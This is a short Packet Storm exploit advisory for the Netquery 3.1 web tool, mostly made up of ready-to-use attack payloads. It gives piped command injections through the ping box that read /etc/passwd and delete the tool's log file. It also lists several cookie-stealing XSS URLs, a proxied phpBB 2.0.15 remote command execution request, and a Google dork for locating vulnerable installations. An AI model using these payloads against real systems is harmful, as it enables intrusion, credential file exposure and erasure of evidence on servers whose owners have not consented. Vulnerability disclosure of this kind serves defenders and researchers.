netquery 3.1 allows for remote command execution, cross site scripting, and information disclosure attacks. Detailed exploitation provided.
8b7e5a03a311f1c2c6e28b6ab732cfa98658760038812a4ed3611802cea3f80eNetquery 3.1 remote commands execution, cross site scripting, information disclosure poc exploit
software:
author site: http://www.virtech.org/tools/
a user can execute commands on target system by PING panel, if enabled like often happens, using pipe char on
"Ping IP Address or Host Name" input text box, example:
| cat /etc/passwd
then you will see plain text password file
| pwd
to see current path
| rm [pwd_output]/logs/nq_log.txt
to delete log file...
disclosure of user activity:
if enabled, a user can view clear text log file through url:
http://[target]/[path]/logs/nq_log.txt
xss:
http://[target]/[path]/submit.php?portnum="/><script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip2.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip2.php?body=<script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports2.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports2.php?body=<script>alert(document.cookie)</script>
http://[target]/[path]/portlist.php?portnum=<script>alert(document.cookie)</script>
a user can use on-line Netquery installations like proxy servers
to launch exploit from HTTP GET request panel, example:
exploiting Phpbb 2.0.15:
make a get request of
http://[vulnerable_server]/[path]/viewtopic.php?t=[existing_topic]&highlight='.system($HTTP_GET_VARS[command]).'&command=cat%20/etc/passwd
googledork: inurl:nquser.php
rgod
email: rgod[at]autistici.org
site: http://rgod.altervista.org
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed